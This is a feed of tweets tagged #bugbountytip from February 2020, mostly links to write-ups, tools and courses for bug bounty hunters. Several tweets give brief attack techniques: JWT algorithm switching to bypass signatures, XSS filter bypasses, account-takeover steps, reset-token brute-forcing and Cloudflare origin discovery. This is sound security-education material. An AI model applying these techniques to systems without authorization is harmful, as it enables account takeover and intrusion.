BUGemot
@bugemot


2020-02-24 22:11:44
0 Multiple Critical Vulnerabilities discovered in Open-Xchange https://t.co/uP4ZhTv6Ta CVE-2019-18846/CVE-2019-9853 - https://t.co/gAO6zM7D7O #bugbountytip #BugBounty #CVE #CyberSecurity
Ammar Amer🇸🇾
@cry__pto


2020-02-24 20:46:10
2 Information Gathering with Google.pdf https://t.co/mOzevBFm30 DNS Enumeration.pdf https://t.co/1BAccMMXRS Vulnerability Research Engineering Bookmarks Collection.txt https://t.co/aRQcnazzlG Escalating SSRF to RCE.pdf https://t.co/yUqgQNel5N #bugbountytip #hacking #pentest #OSINT
Steve Mcilwain
@steve_mcilwain


2020-02-24 18:03:46
3 Tired of manually tuning scope in Burp Suite? I just tried rescope by @root4loot. It lets you point to the URL of a bug bounty program and generate scope for Burp or Zap. https://t.co/9SdUJLbqEE #BugBounty #bugbountytips #bugbountytip
Noman | نعمان | नोमान
@nomanAli181


2020-02-24 17:24:32
0 Few months back this portal first came on a diff subdomain, But I was done for the day and bookmarked it to analyze it next day but that host went down. Last week it came back on a new host and this time I was ready :) #bugbountytip monitor the targets you know/love #bugbounty https://t.co/7IIC0EXlIt
Pranav Hivarekar
@HivarekarPranav


2020-02-24 16:30:00
11 GraphQL Security Testing: Resources to learn- - https://t.co/tMqWzRtxLE - https://t.co/yvqDh89goj Research- https://t.co/1LSUUDHEnh Examples of bugs: - https://t.co/0yOBmHudTt - https://t.co/Ts6hgFJlxr - https://t.co/vNaECJNxa3 #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-24 15:49:27
2 SIM Api key leak found by @KHIZER_JAVED47 Tip: While doing recon, always extract mobile App and read the files, some devs forgot API KEY, PASSWORD and other juicy stuff in it. (3 min read) https://t.co/ijrYjZOKT2 #bugbountytips #bugbountytip #bugbounty
baluz🔥
@oyenom


2020-02-24 15:20:51
3 Bypass android ssl pinning apk No frida needed...... #bugbountytip #bugbounty https://t.co/FBgYMcjRws
baluz🔥
@oyenom


2020-02-24 15:17:14
0 My blog no 3 bypassing ssl pinning of android apk #bugbounty #bugbountytip https://t.co/XYeM6zw6pN
baluz🔥
@oyenom


2020-02-24 12:26:35
0 Accessing your phone through ssh https://t.co/a79A90Iz1D #bugbountytip #bugbounty
Shubham Arya
@iam_shubhamarya


2020-02-23 18:52:08
1 My first blog :) “Hack The Box Methodology” by Shubham Arya https://t.co/zmS4pzH0rv . . . . #Hacking #bugbountytip #bugbountytips #Hackers #Hackthebox #CyberSecurity #Python #programming #code
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 18:09:20
4 SQLi Without Quotes (MariaDB) https://t.co/W7bdONVllL Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 17:26:54
1 Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ICR7fEC3i8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 14:05:03
1 🤣 Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/tNflpuxYZq
Your Next Bug Tip
@YourNextBugTip


2020-02-23 12:07:35
5 Badoo Acc Takeover - Create 2 Accs & link 2 diff fb acc in each of them - As attacker import pics via fb & copy the link - Send the link to victim - Login via attacker's fb in victim's acc Hacked by @rootxharsh https://t.co/08VkMXaDbS #bugbountytips #bugbountytip #bugbounty
siLLyDaDDy
@sillydadddy


2020-02-23 11:13:57
0 #bugbountytip I am very very new to bug bounty . But my experience in other fields have taught me "how to learn " I see , my brothers/friends just taking a course and trying hard , really hard on bug bounties If your axe is blunt no matter how hard u hit u cannot cut a tree
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 07:04:52
0 #Swag For Hackers and Bug Hunters Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8tJRnZ8O2U
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 04:53:59
1 #SpiderMan vs #HackerMan Follow Us for Bug Bounty Tips #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8MHcRUYdOH
Your Next Bug Tip
@YourNextBugTip


2020-02-23 03:40:15
5 Click Reset Pwd N times U will get N links If first link still works Then issue as much as links possible Bruteforcing Token will be easy If there is no rate limit then B000M Write Up by @LnaziJubaerSec https://t.co/VcExv4xer1 #bugbountytips #bugbountytip #bugbounty
Security Executions Code
@pwn0sec


2020-02-23 00:38:44
1 Googleapis /auth/admin/* #bugbountytip #bugbountytips #google https://t.co/VdADtMDFwN
Steve Mcilwain
@steve_mcilwain


2020-02-22 17:11:42
0 I store recon data on my VPS, then sync it to my laptop with sshfs and rsync (in WSL) sshfs <user>@<rhost>:~/data /mnt/data rsync -avu /mnt/data /mnt/d/recon/data fusermount -u /mnt/data #PenTest #BugBounty #bugbountytip #bugbountytips #OSINT
ghostlulz
@ghostlulz1337


2020-02-22 16:37:00
5 CSV Injection: https://t.co/loAf6mRXft ClickJacking: https://t.co/kcOYSJcbUG Exposed Firebase DB: https://t.co/WGzatNLO3C Config Files: https://t.co/Kft6p37wJM Kubernetes API : https://t.co/IZyHZ1gUJt #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss https://t.co/73dOl6kmfM
Ammar Amer🇸🇾
@cry__pto


2020-02-22 15:22:21
9 100 ways to discover (part 1).pdf https://t.co/kCMiq7Zo1o Pentesting.pdf https://t.co/gqpXSJ29D7 Building a Malware Analysis Lab:Become a Malware Analysis Hunter in 2019.pdf https://t.co/pOvtev7KqN #bugbountytips #hacking #OSINT #pentest #redteam #Malware #bugbountytip #infosec
siLLyDaDDy
@sillydadddy


2020-02-22 13:00:12
2 #bugbounty #bugbountytip All the bug bounty write ups from @PentesterLand in an excel format . https://t.co/9xNrXKNzaP I just wanted to keep track of the https://t.co/2BlY5zTycw i pulled out the data .Hope @PentesterLand wont mind !!
Vijaysimha Reddy Bathini
@fatratfatrat


2020-02-22 11:34:58
5 My new writeup on account takeover vulnerabilities. Thanks to @Bugcrowd . https://t.co/GeLF2Xatoh #BugBounty #infosec #bugbountytip #bugbountytips #bugcrowd #CyberSecurity
Your Next Bug Tip
@YourNextBugTip


2020-02-22 08:38:15
5 Open Redirect to Account Takeover when token didn't leak Takeover is only possible when token leak with get request. But he manage to takeover without it. Profile https://t.co/VyQuQ70sqf https://t.co/Oy52jljsrG #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:32:59
0 Useful Link to Learn Pentesting and Bug Bounty : If you want to learn Cyber Security and Ethical Hacking from professionals - Reach out to us ! https://t.co/iNczOcXY13 https://t.co/E2teD1IjCh #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:30:20
0 OWASP Vulnerabilities https://t.co/rYwbpkyizq Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:26:57
1 Vulnerability Rating Taxonomy - VRT Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 https://t.co/Td94mIsExN #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
ghostlulz
@ghostlulz1337


2020-02-21 23:55:01
1 Client Side Template Injection is the modern day XSS. People think frameworks like Angular are immune to XSS but it isn't. It's just a little bit different to execute. More info on my blog https://t.co/JnSGKDmvLm #BugBounty #bugbountytips #infosec #bugbountytip #redteam #Angular https://t.co/q2VZmkMsIs
Tomi Koski 💾💀
@tomikoski


2020-02-21 18:51:33
0 Ahoy all #BugBounty hunters, support marvelous work from creator of #ffuf and sponsor this dude @joohoi at #github You can do it 🤘 #bugbountytip
Shifa
@shifa_skh


2020-02-21 16:08:14
2 Always convert parameter to array you will get unexpected result, sometimes xss bypass Like, path=/abc to path["]=/abc #bugbountytip
Israel Thomas
@IsraelThomas_7


2020-02-21 14:28:23
0 John Doe: Read the damn documentation before you start hunting on my program. Me: Yeah sure, I'm still checking for the hidden document endpoint. #bugbountytip #infosec
Mayur Parmar
@th3cyb3rc0p


2020-02-21 13:26:48
0 Pro tip for bug hunting while making report don't forget to add fix of that vuln. It will increase to get bonus points/bounty. #th3cyb3rc0p #bugbountytip #bugbounty @intigriti @Bugcrowd @Hacker0x01 @openbugbounty @synack
apuhc
@apuhccc


2020-02-20 20:38:24
0 #ProTip #burpsuite #bugbountytip by @Agarri_FR (thank you master ) https://t.co/uuptoV0KtV
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-20 15:21:50
4 @CyberSecCare CyberSecCare : A python Twitter that retweets all Security-Related tweets. Video on Youtube : https://t.co/lHmtfXOy1e #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/Qv7NuXk5A4
Security Executions Code
@pwn0sec


2020-02-20 15:06:11
2 Reflected (XSS) Vulnerability - on https://t.co/d5oILl2Zpw (Sandbox Domain) https://t.co/JeyZTE46cc #bugbountytip #bugbountytips #googlexss #xss https://t.co/9jesYX7z3S
Security Executions Code
@pwn0sec


2020-02-20 14:10:48
1 Broken Authentication and session management (OWASP A2) https://t.co/iFznOWZvfv #bugbountytip #bugbountytips #owasp https://t.co/0yZGL5z3al
Mohit Sharma
@ms1241721


2020-02-20 12:45:09
0 #Bugbountytip Founded no rate limit on login page : Reported but got Duplicate Tried again on another critical endpoint : Triaged Lesson learnt - If one endpoint is vulnerable , check all other, chances are they will also be vulnerable
Bug Spotter
@BugSpotter


2020-02-20 03:58:36
0 "Good bugs do not require great skills! They require sharp eyes" -Anees Khan #infosec #BugBounty #Bugbountytip
Mourad
@SecuAudit


2020-02-19 20:10:32
2 Everything is marked as "Low severity" and There is nothing you can do except leaving this program. #BugBounty #Bugbountytip @Hacker0x01 https://t.co/V9zRDo9Vxb
GokhanGK
@gkhck_


2020-02-19 19:40:43
1 New write-up 🥳🥳🥳 #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/E4UnlvFHWi
Leonishan
@leonishan_


2020-02-19 19:00:31
3 WAF Bypassing with Unicode Compatibility https://t.co/jSccqnlGQC #BugBounty #Bugbountytip #WAF #wafbypass #XSS
theCBTL_Edge
@theCBTL_Edge


2020-02-19 18:32:10
0 Researchers have tricked Tesla vehicles into accelerating from 35 mph to 85 mph using duck tape. The researchers modified the shape of a 3 to look like an 8 on multiple street signs. #Tesla #Bugbountytip
Manyasa Oliver
@M_Oliver_Watiti


2020-02-19 18:26:12
0 Anyone Who Has come across .htmopt extension anywhere? #Bugbountytip #bugbounty
Pranav Hivarekar
@HivarekarPranav


2020-02-19 17:00:01
6 Mastering the Skills of Bug Bounty by @vickieli7 via @thestartup_ https://t.co/LZGj7GQW5n #bugbounty #bugbountytip
z3rb0a
@OwlCyberGhost1


2020-02-19 16:02:41
0 #bugbountytip #bugbounty Weird Bug. Changing my username to number 10 or 12 or ...10000 will disclose other user Information ( Including Access token & Session token ) Lol xD
Shubham Sharma
@Shubham_pen


2020-02-19 14:32:44
0 Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hacker’s Swiss Army Knife. @rajchandel @kalilinux #cybersecurity #infosec #pentest #oscp #meterpreter #Bugbountytip #Hackers #WednesdayWisdom https://t.co/PbDAnudJFL
Nameless
@3301o


2020-02-19 13:23:28
0 When use WayBackUrls by @TomNomNom, use below Regex to find parameterized URL(s): \/[A-Za-z0-9_.-]*[a-z]*\?.*= #bugbountytips #Bugbountytip #BugBounty
Cyber Security Bot
@CyberSecCare


2020-02-19 09:47:15
3 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets containing the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
CyberTaters
@CyberTaters


2020-02-19 08:58:16
2 Follow to get all Security/Potato Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets containing the below twitter tags : #potatosecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #mashing
Cyber Security Bot
@CySecuritybot


2020-02-19 08:58:11
2 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets containing the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Manoj Khadka
@Manojkhd


2020-02-19 08:39:52
0 Websites vulnerability and Bug reporting @Administor #Bugbountytip #bughunter #vulnerable #webserver #xss #crsf https://t.co/Go7DFoSqBR
HackIsOn ®
@hackison


2020-02-19 08:17:49
2 #Bugbountytip If you want to bypass cloudflare protection and find the target’s origin ip. Use : https://t.co/TGirjy7p2g to find targets domain’s DNS history. C2C 🤗 #bugbounty #bugbountytip #bugbountytips #hackison #hacking #vapt #wapt #pentesting #redteaming #redteam
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-02-19 06:20:25
0 I need to find my first bug. Not even because of the money. For my mental health. #BugBounty #Bugbountytip
Pratik Yadav
@PratikY9967


2020-02-19 05:29:18
0 Sometime .gitignore file can help you to get database credentials as well try to visit all endpoints showed up by gitignore on all subdomains :)😂😂 #bugbountytip #bugbounty #infosec https://t.co/qAjnmRXLgs https://t.co/lGKsuT7C5x
Joseph Melika
@jmelika


2020-02-19 04:16:30
0 #bugbountytip When you see SSO with JWT, intercept, decode, change the alg to either none or HS232 to bypass signature and send the new encoded JWT instead. If it goes through, you hit the jackpot. #SecureTheInternet #CESPPA #bugbounty #bugbountytips
Hx01
@Hxzeroone


2020-02-18 16:31:35
2 #Bugbountytip If you want to bypass cloudflare protection and find the target’s origin ip. Use : https://t.co/NU3CNcekJi to find targets domain’s DNS history. https://t.co/yz1Z2jGKvN
ALL ABOUT HACKER
@AboutHacking


2020-02-18 16:24:43
0 How to start Bug Bounty Hunting Read: https://t.co/9DAu77YcZ8 #CyberSecurity #bugbounty #bugbountytips #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-18 15:30:00
8 WebSockets Security Testing: - https://t.co/yjUbgZJeZY - https://t.co/Gf6dofbt7J - https://t.co/ykbQAv6b8G Tools: - https://t.co/tw3icPAFZS - Burp - https://t.co/UpH9TM3TWK Case studies: - https://t.co/AaY9a6GFQ1 - https://t.co/0D1c9c8bhW #bugbounty #bugbountytip #infosec
Shubham Sharma
@Shubham_pen


2020-02-18 15:18:58
1 Today you will learn how to escalate the root shell if docker is running on the host machine or I should say @Docker privilege escalation to spawn root shell. @rajchandel @ubuntu #cybersecurity #pentest #ITSecurity #bugbountytip #infosec #tuesdayMotivation https://t.co/4vYoWaz2fY
Brett Russell
@brettarussell


2020-02-18 15:06:45
0 You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip https://t.co/7V1A8iZd30
Brett Russell
@brettarussell


2020-02-18 15:04:05
0 @crypto_bobby You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-18 14:45:36
2 Bug Bounty Tips part 3 #bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bugcrowd #hacker #ethicalhacking #hacking #Pentesting #webapp #webappsec #appsec #applicationsecurity #infosec #cybersec #cybersecurity #informationsecurity https://t.co/YMP5pCY7yE
Anas Mahmood 🇵🇰
@AnasIsHere


2020-02-18 14:06:11
3 Also, You can check the domain, if it have any private program on Bugcrowd by looking its TXT record with dig dig TXT domain.tld | grep bugcrowd #BugBounty #BugBountyTip #OutHackThemAll https://t.co/WCbwg4ZNxo
Jake Miller
@theBumbleSec


2020-02-18 13:01:10
15 I am excited to release my new tool GadgetProbe: Inspect endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote classpaths. No more sitting in the dark if ysoserial doesn't fire. https://t.co/lJfeIMMzeU #bugbounty #bugbountytip
Anas Mahmood 🇵🇰
@AnasIsHere


2020-02-18 12:10:07
1 Hey Bug Bounty Folks, Want more private programs on Bugcrowd? Just visit this https://t.co/iqgKAiy5Xr Also, dig TXT domain.tld | grep bugcrowd #BugBountyTip 🤙
Nouroz Gaming
@NourozGaming


2020-02-18 08:05:58
0 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/rtAQmQFkUU
Khaled Mohamed
@0xElkomy


2020-02-17 21:03:25
0 OneLogin authentication bypass on WordPress sites https://t.co/6NcFwEg5lk #bugbountytips #bugbounty #bugbountytip
CyberTheReapeR☢
@CyberTheReapeR5


2020-02-17 19:07:41
0 Yay, i earned 300$ I did not win this award on any bug bounty platform #hackerone #bugcrowd #infosec #bugbountytip
m0z
@LooseSecurity


2020-02-17 18:51:32
1 Three really good event handlers for XSS would be: onfocus onsearch And also using accesskeys, which is usually low severity but a really easy way to get XSS as it bypasses most security measures. #bugbountytips #bugbountytip #bugbounties #infosec #infosecurity #coronavirus
Your Next Bug Tip
@YourNextBugTip


2020-02-17 17:18:32
5 XSSI and JSONP found by Omkar Bhagwat @th3_hidd3n_mist Important notes and #bugbountytips at the end of the WriteuP Vul Worth $$800$$ If you are new to XSSi and JSONP then MUST READ the WriteuP #bugbountytip #bugbounty https://t.co/vOguXKK8Te
ｙｏｄｈｈａ
@y0dhha


2020-02-17 16:11:46
1 1) Data Processing (IBB) disclosed a bug submitted by geeknik https://t.co/yqNZldQJ1p 2) [API] ICQ user's avatar can be manipulated remotely https://t.co/O31iYklXPk #bugbountytips #bugbounty #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-02-17 16:11:14
2 1) CORS misconfiguration which leads to the disclosure of certain data concerning the user. https://t.co/AfzrUS0BAh 2) JAVASCRIPT INJECTION IN SIX ANDROID MAIL CLIENTS https://t.co/RAo0IlmgEV #bugbountytips #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-17 09:24:29
2 Cisco Type 7 Reverser Paste any Cisco IOS "type 7" password string into the form below to retrieve the plaintext value. Follow Hackdoor - https://t.co/iNczOcGmCt https://t.co/uTzPKkBn6S #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-17 09:19:05
3 CEHv9-Notes - If you want to be professional Penetration Tester and Bug Bounty Expert - Follow Hackdoor : Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #cybersecurity https://t.co/LIlYcZOBk7
Ammar Amer🇸🇾
@cry__pto


2020-02-16 21:59:57
0 CTF Challenges Archives: https://t.co/xFeGOlUGhs #bugbountytip #hacking #pentest #redteam
Ammar Amer🇸🇾
@cry__pto


2020-02-16 21:53:51
1 Find Secret API-Keys: https://t.co/6BZkftxJnJ #bugbountytip #hacking
Andrew Roe
@aroe1994


2020-02-16 21:04:18
0 We are LIVE with #HackTheBox! https://t.co/a2ASaTS2z3 #cybersecurity #bugbountytip
CyberTheReapeR☢
@CyberTheReapeR5


2020-02-16 17:28:08
0 İ earned 2.000$ (I did not win this award on any bug bounty platform) Bugs: 2 subdomain takeover 2 xss (self and reflected) 1 sql injection 1 SQL database username and password information. Total: 2.000$ #hackerone #bugcrowd #infosec #bugbountytip
ghostlulz
@ghostlulz1337


2020-02-16 16:55:45
0 Bug Bounty Slack Group over 1,500 hackers. If you're looking for a space where you can chat, learn, share knowledge, and meet like minded people you should check out my slack channel. https://t.co/lwmVfsjSPm #bugbounty #bugbountytips #bugbountytip #infosec #redteam #security https://t.co/RBR2vQBlFN
Pranav Hivarekar
@HivarekarPranav


2020-02-16 14:04:43
12 SAML Security Testing Tutorial: 1 - https://t.co/imIWYX6AdF 2 - https://t.co/Gz9Vg2DeoX 3 - https://t.co/RVX6m56n0W Attack Surface: https://t.co/DIsjXQYJ06 Examples of bugs: - https://t.co/D6aHlzTxlA - https://t.co/YFy5SHYHL4 - https://t.co/e74Msi6a3k #bugbounty #bugbountytip
Shubham Patel
@Shubham_4500


2020-02-16 07:51:52
0 #bugbountytip #bugbountytips Report First and then in free time do the additional exploit , got duplicate with the difference of 4 reports, its part of bugbounty life :) lesson learned with heart full of guilt. #hackerone #bugbountylife #bugcrowd https://t.co/g0aBsB8I2G
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-16 07:25:48
7 Which one do you prefer ? #GOOGLE v/s #DUCKDUCKGO Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/9YlR6DAjcZ
ghostlulz
@ghostlulz1337


2020-02-16 03:20:13
10 You know Django, Flask and many other python web libraries are vulnerable to RCE when you enable debug mode. Most people don't know this is possible. More info on my blog: https://t.co/rpPIaQpDaL #bugbounty #bugbountytips #bugbountytip #redteam #infosec #flask #django #python https://t.co/JrUzyoI10q
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-16 02:46:26
0 #unc0ver v4.0.0 is NOW OUT - Now with full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection! Get it at: https://t.co/Wfzq4z4aQU Follow Us 💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-15 17:59:50
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jDvHB5ty2z
Edwin Digital #digitalke #edmuke
@digitalked


2020-02-15 17:23:31
1 Do you like the wayback machine? Do you like sqli injection? What happens when you combine them both, you get a unique sqli scanner. Check out my blog for more info: https://t.co/a80MXOn1er #BugBounty #bugbountytips #bugbountytip #osint #hacking #dfir #infosec #sqli
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:48:11
1 @Burp_Suite To avoid @zaproxy crashes when you have Large Response, try to install oracle JDK instead of OpenJDK #bugbountytips #bugbountytip #bugbounty #infosec
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:43:25
1 You can specify memory size for @Burp_Suite to make it more smoother by using -Xmx (3GB example): ~$ java -jar -Xmx3072M /path/to/burpsuite.jar or ~$ java -jar -Xmx3G /path/to/burpsuite.jar #bugbountytips #bugbountytip #bugbounty #infosec
ghostlulz
@ghostlulz1337


2020-02-15 15:53:12
2 If you're looking to make a 🤑living🤑 doing Bug Bounties or Pentesting you may want to get a copy of my book. Easy wins all day💰. https://t.co/zJFRZjg5q2 #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #appsec #cybersecurity #xss #hacker #cyber #security https://t.co/rSdiFyIR9U
Nikhil Mahajan
@mahajan344


2020-02-15 15:02:38
0 want to do a static and dynamic analysis of android apps on the fly / on the web. use @apklabio They provide very good static /dynamic /network analysis of apk files. #AndroidSecurity #bugbountytip #bugbounty #AndroidHackingMonth on @Hacker0x01 https://t.co/cNXt1gKLvg
Str0k1rch🏴‍☠️
@str0k1rch


2020-02-15 13:01:24
1 Make sure to update fellow hacker ;) #bugbountytip https://t.co/SzEKGgxNaX
Khaled Mohamed
@0xElkomy


2020-02-15 11:03:07
0 Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target. https://t.co/Yhzwb92gOV #bugbountytips #bugbounty #infosec #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-15 08:48:57
7 Shodan Pentesting Guide https://t.co/ef11lug0EW #bugbounty #bugbountytip
Hridoy Ahmed
@hridoysec


2020-02-15 05:43:41
0 #bugbountytip from @TH3G3NT https://t.co/jRtpMU2f1F
Your Next Bug Tip
@YourNextBugTip


2020-02-15 04:39:55
0 Must Read #bugbountytip https://t.co/haPpJR89XF
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-14 19:14:04
1 #BugBountyTip : Be creative with wordlists. #Seclists is great but every bug hunter uses it. If you are looking for non-#duplicates use #CRUNCH to generate your own wordlists specific to your web app / api platform ! Follow #Hackdoor - https://t.co/iNczOcGmCt #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-14 16:48:01
0 Automate your recon screenshots via command line or script with Eyewitness. Can take a file of URLs as input. https://t.co/Tc6yWK3ulG #pentest #pentesting #bugbountytip #bugbountytips #hacking
Your Next Bug Tip
@YourNextBugTip


2020-02-14 16:42:46
2 Unique way of Account Takeover @0xAkash figure out how to create password reset token!! Must Read (2 min read) https://t.co/Xfax4i7lSN #bugbounty #bugbountytips #bugbountytip
Imran Parray
@CreedHackers


2020-02-14 16:40:52
1 #BugBountyTip You will always Find what you are looking for. So if you haven't found a RCE,SSRF or any other critical ones yet. Probably you aren't looking for them.
Your Next Bug Tip
@YourNextBugTip


2020-02-14 14:11:24
0 What are some good Hacker's Groups? On #Discord #Slack #anyPlatform #bugbounty #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-02-14 13:12:35
11 use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons: https://t.co/lBtuovYuWB 19-extensions-to-turn-google-chrome-into-penetration-testing-tool: https://t.co/f2rcEFu7LX #bugbountytip #hacking #pentest #BugBounty
Kartik Charande
@kartikraj909


2020-02-14 09:49:51
0 Amazing write up quick explanation #bugbountytip #infosec https://t.co/ezJBqzZdrw
Ammar Amer🇸🇾
@cry__pto


2020-02-14 06:01:12
3 SimplyEmail: -setup: curl -s https://t.co/MO25nwVDJD -usage: ./SimplyEmail -all -v -e https://t.co/KdHhpMULry results: firefox https://t.co/KdHhpMULry<date_time>/Email_List.html -1-email address format of the target -2-list of valid users #OSINT #pentest #bugbountytip #hacking
Mourad
@SecuAudit


2020-02-13 22:31:42
0 @Godaddy Bug Bounty is a scam , i got a lot of testimonials of security researchers scammed by them #bugbounty #bugbountytip #bugbountytips #infosec #Hacker0x01 @GoDaddyCanada @GoDaddyHelp https://t.co/GcoryY6rbf
Mast3rM1nd
@lollysofsof


2020-02-13 22:25:54
2 let's educate each others :) #infosec #pentesting #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-13 19:45:34
0 From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 Follow #Hackdoor Facebook https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training https://t.co/mHCTPO2kMP
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-13 18:06:51
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Nm2ZSJHS74
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-13 18:06:16
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/spJfF1f6qy
Ganesh Bagaria
@Ganofins


2020-02-13 14:24:50
0 I just finished Access Control materials and labs on @WebSecAcademy Any suggestion for other labs or exercises or live sites based on access control vulnerabilities? #accesscontrol #idor #portswigger #bugbountytip
INTIGRITI
@intigriti


2020-02-13 14:05:21
18 ⚠️ Are you signing your JWT tokens? Good...unless hackers can change the signing algorithm to none. Make sure to check this, or @yassineaboukir will do it for you and claim yet another #BugBounty! 😂 #BugBountyTip #HackWithIntigriti https://t.co/1sW1B766Qi
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-02-13 12:39:55
1 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DaPtYGY7pB
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-13 09:10:16
